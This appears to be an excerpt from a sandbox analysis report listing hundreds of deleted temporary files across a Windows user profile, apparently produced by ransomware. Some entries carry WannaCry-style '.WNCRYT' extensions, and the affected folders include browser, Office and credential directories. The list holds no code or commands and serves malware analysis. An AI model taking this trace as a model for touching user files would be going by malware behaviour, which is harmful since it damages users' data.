DeletedFile: C:\Users\user\~SDC0EF.tmp
DeletedFile: C:\Users\user\.ms-ad\~SDC0F0.tmp
DeletedFile: C:\Users\user\AppData\~SDC0F1.tmp
DeletedFile: C:\Users\user\AppData\Local\~SDC0F2.tmp
DeletedFile: C:\Users\user\AppData\Local\Adobe\~SDC103.tmp
DeletedFile: C:\Users\user\AppData\Local\Adobe\Acrobat\~SDC104.tmp
DeletedFile: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\~SDC105.tmp
DeletedFile: C:\Users\user\AppData\Local\Adobe\AcroCef\~SDC106.tmp
DeletedFile: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\~SDC116.tmp
DeletedFile: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\~SDC117.tmp
DeletedFile: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\~SDC176.tmp
DeletedFile: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\blob_storage\~SDC1B6.tmp
DeletedFile: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\blob_storage\fb9136c9-56b8-4a66-aca4-73cc2fd2f175\~SDC214.tmp
DeletedFile: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\~SDC263.tmp
DeletedFile: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\~SDC293.tmp
DeletedFile: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\~SDC2D3.tmp
DeletedFile: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\wasm\~SDC312.tmp
DeletedFile: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\wasm\index-dir\~SDC342.tmp
DeletedFile: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cookie\~SDC391.tmp
DeletedFile: C:\Users\user\AppData\Local\Adobe\ARM\~SDC3D1.tmp
DeletedFile: C:\Users\user\AppData\Local\Adobe\ARM\S\~SDC3F1.tmp
DeletedFile: C:\Users\user\AppData\Local\Adobe\ARM\{291AA914-A987-4CE9-BD63-AC0A92D435E5}\~SDC450.tmp
DeletedFile: C:\Users\user\AppData\Local\Adobe\Color\~SDC49F.tmp
DeletedFile: C:\Users\user\AppData\Local\Apps\~SDC51D.tmp
DeletedFile: C:\Users\user\AppData\Local\Apps\2.0\~SDC54D.tmp
DeletedFile: C:\Users\user\AppData\Local\Apps\2.0\0ZVHNN42.ABB\~SDC56D.tmp
DeletedFile: C:\Users\user\AppData\Local\Apps\2.0\0ZVHNN42.ABB\NR814KPV.P8V\~SDC5BC.tmp
DeletedFile: C:\Users\user\AppData\Local\Apps\2.0\0ZVHNN42.ABB\NR814KPV.P8V\manifests\~SDC5EC.tmp
DeletedFile: C:\Users\user\AppData\Local\Apps\2.0\Data\~SDC60C.tmp
DeletedFile: C:\Users\user\AppData\Local\Apps\2.0\Data\CQB0Y326.MOO\~SDC66B.tmp
DeletedFile: C:\Users\user\AppData\Local\Apps\2.0\Data\CQB0Y326.MOO\M3VCAP6Z.25X\~SDC6AB.tmp
DeletedFile: C:\Users\user\AppData\Local\Boxstarter\~SDC6DA.tmp
DeletedFile: C:\Users\user\AppData\Local\CEF\~SDC72A.tmp
DeletedFile: C:\Users\user\AppData\Local\CEF\User Data\~SDC769.tmp
DeletedFile: C:\Users\user\AppData\Local\CEF\User Data\Dictionaries\~SDC799.tmp
DeletedFile: C:\Users\user\AppData\Local\Deployment\~SDC7D8.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\~SDC828.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\~SDC867.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\~SDC8C6.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates\~SDC8D6.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics\~SDC8D7.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation\~SDC8D8.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\ClientSidePhishing\~SDC8D9.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\~SDC8DA.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments\~SDC8DB.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports\~SDC8EC.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny\~SDC95A.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\~SDC9AA.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\~SDCA08.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\~SDCA57.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\44191681-e6d2-41ed-948c-a2cdae484e83\~SDCAC6.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\~SDCB34.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\~SDCBA3.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\~SDCBE2.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\~SDCC22.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\~SDCC32.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\~SDCC33.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\~SDCC34.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir\~SDCC35.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\~SDCC36.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db\~SDCC66.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache\~SDCC96.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\~SDCCD5.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\~SDCD34.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files\~SDCD74.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\~SDCDB3.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\~SDCE02.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\~SDCE51.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\~SDCE91.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB\~SDCEB1.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\~SDCEE1.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\~SDCF01.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\~SDCF22.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\~SDCF71.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\~SDCF91.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\~SDCFB1.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store\~SDCFE1.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store\~SDD04F.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Safe Browsing Network\~SDD09F.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\~SDD0DE.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB\~SDD10E.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB\~SDD14D.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB\~SDD16E.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\~SDD1AD.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions\~SDD1ED.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\~SDD23C.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\~SDD25C.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\~SDD29C.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\~SDD2CB.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\~SDD2EC.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\DesktopSharingHub\~SDD32B.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\FileTypePolicies\~SDD37A.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\FirstPartySetsPreloaded\~SDD3AA.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\FontLookupTableCache\~SDD3EA.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\GrShaderCache\~SDD41A.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\hyphen-data\~SDD459.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\MEIPreload\~SDD489.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\OnDeviceHeadSuggestModel\~SDD4C8.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\OptimizationHints\~SDD4F8.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\OriginTrials\~SDD4F9.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\PKIMetadata\~SDD4FA.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\pnacl\~SDD4FB.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\RecoveryImproved\~SDD4FC.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\Safe Browsing\~SDD50D.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\SafetyTips\~SDD50E.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\ShaderCache\~SDD54D.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\~SDD55E.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\Subresource Filter\~SDD57E.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\Subresource Filter\Unindexed Rules\~SDD59F.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\SwReporter\~SDD5BF.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64\~SDD5EF.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\UrlParamClassifications\~SDD61F.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\WidevineCdm\~SDD65E.tmp
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\ZxcvbnData\~SDD69E.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\~SDD6DD.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Credentials\~SDD70D.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Device Metadata\~SDD73D.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Device Metadata\dmrccache\~SDD77C.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Device Metadata\dmrccache\downloads\~SDD78D.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Edge\~SDD7AD.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\~SDD7CD.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\~SDD7EE.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation\~SDD81E.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\~SDD87C.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\~SDD8BC.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\~SDD90B.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AutofillStrikeDatabase\~SDD979.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\blob_storage\~SDD9D8.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\blob_storage\6af35b70-7d44-4f46-9acd-3b4fa9cd6081\~SDDA27.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\BudgetDatabase\~SDDA67.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Cache\~SDDAA6.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\~SDDAA7.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\~SDDAC7.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\~SDDAD8.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\~SDDAE9.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\index-dir\~SDDAF9.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\~SDDB1A.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokens\~SDDB2A.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\~SDDB2B.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Feature Engagement Tracker\~SDDB3C.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Feature Engagement Tracker\AvailabilityDB\~SDDB8B.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Feature Engagement Tracker\EventDB\~SDDBDA.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\~SDDC29.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\JumpListIconsRecentClosed\~SDDC49.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\~SDDC5A.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\~SDDC9A.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\~SDDCD9.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\~SDDCF9.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Platform Notifications\~SDDD39.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\~SDDD59.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\~SDDDB8.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\~SDDE07.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\~SDDE56.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\~SDDE76.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\~SDDEA6.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\~SDDEE6.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\~SDDF35.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\~SDDF84.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\~SDDFD3.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\index-dir\~SDE022.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm\~SDE081.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm\index-dir\~SDE0A1.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\~SDE0E1.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\~SDE101.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\~SDE150.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Platform Notifications\~SDE1CE.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\~SDE21D.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\~SDE24D.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\~SDE26D.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\FontLookupTableCache\~SDE2BC.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\PepperFlash\~SDE2FC.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Safe Browsing\~SDE36A.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\~SDE39A.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\~SDE3DA.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\~SDE3EA.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\~SDE40B.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\~SDE42B.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\~SDE46A.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\~SDE4AA.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\WidevineCdm\~SDE4DA.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Event Viewer\~SDE529.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Feeds\~SDE578.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Feeds\Feeds for United States~\~SDE5D7.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\~SDE626.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\WebSlices~\~SDE646.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Feeds Cache\~SDE6B4.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Feeds Cache\BD5QM5PR\~SDE6F4.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Feeds Cache\S0OSSLWD\~SDE733.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Feeds Cache\SQ4TDUZM\~SDE773.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Feeds Cache\ZLFI91IZ\~SDE7A3.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\~SDE7D3.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\brndlog.txt.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DomainSuggestions\~SDE822.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\~SDE871.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\3HLJ65W4\~SDE8B0.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\D3CVYKUR\~SDE8D1.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\DGF898HW\~SDE8F1.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\DRJ7CCJA\~SDE8F2.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\EmieSiteList\~SDE8F3.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\EmieUserList\~SDE932.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\EUPP\~SDE982.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\IECompatData\~SDE9E0.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\~SDEA2F.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\l51tpzc\~SDEA40.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\rs8lb9c\~SDEA60.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\~SDEABF.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\~SDEAFF.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\~SDEB2E.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Last Active\~SDEB4F.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\TabRoaming\~SDEB5F.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\~SDEB60.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-2845162440\~SDEB71.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin9728060290\~SDEB72.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tracking Protection\~SDEB73.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\UrlBlockManager\~SDEB74.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Media Player\~SDEBB3.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\~SDEBE3.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\~SDEBF4.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0000C0CE\~SDEC24.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Media Player\Transcoded Files Cache\~SDEC44.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Office\~SDEC74.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Office\15.0\~SDECB3.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Office\15.0\WebServiceCache\~SDED03.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Office\15.0\WebServiceCache\AllUsers\~SDED32.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Office\15.0\WebServiceCache\AllUsers\binaries.templates.cdn.office.net\~SDED62.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Office\15.0\WebServiceCache\AllUsers\cdn.odc.officeapps.live.com\~SDEDD1.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Office\15.0\WebServiceCache\AllUsers\office15client.microsoft.com\~SDEDD2.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Office\16.0\~SDEDD3.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Office\16.0\Floodgate\~SDEDD4.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WEF\~SDEDD5.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WEF\AppCommands\~SDEDE5.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\~SDEDE6.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\~SDEDE7.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ThirdPartyNotices.txt.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\af\~SDEDF8.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\am-et\~SDEDF9.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\amd64\~SDEDFA.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ar\~SDEDFB.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\as-in\~SDEDFC.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\az-latn-az\~SDEDFD.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\be\~SDEDFE.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\bg\~SDEE1E.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\bn-bd\~SDEE4E.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\bn-in\~SDEE7E.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\bs-latn-ba\~SDEECD.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ca\~SDEF3B.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ca-es-valencia\~SDEF6B.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\cs\~SDEFCA.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\cy-gb\~SDEFFA.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\da\~SDF0A7.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\de\~SDF0E6.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\el\~SDF126.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\en\~SDF156.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\en-gb\~SDF1A5.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\es\~SDF1E4.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\et\~SDF214.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\eu\~SDF273.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\fa\~SDF2E1.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\fi\~SDF311.tmp
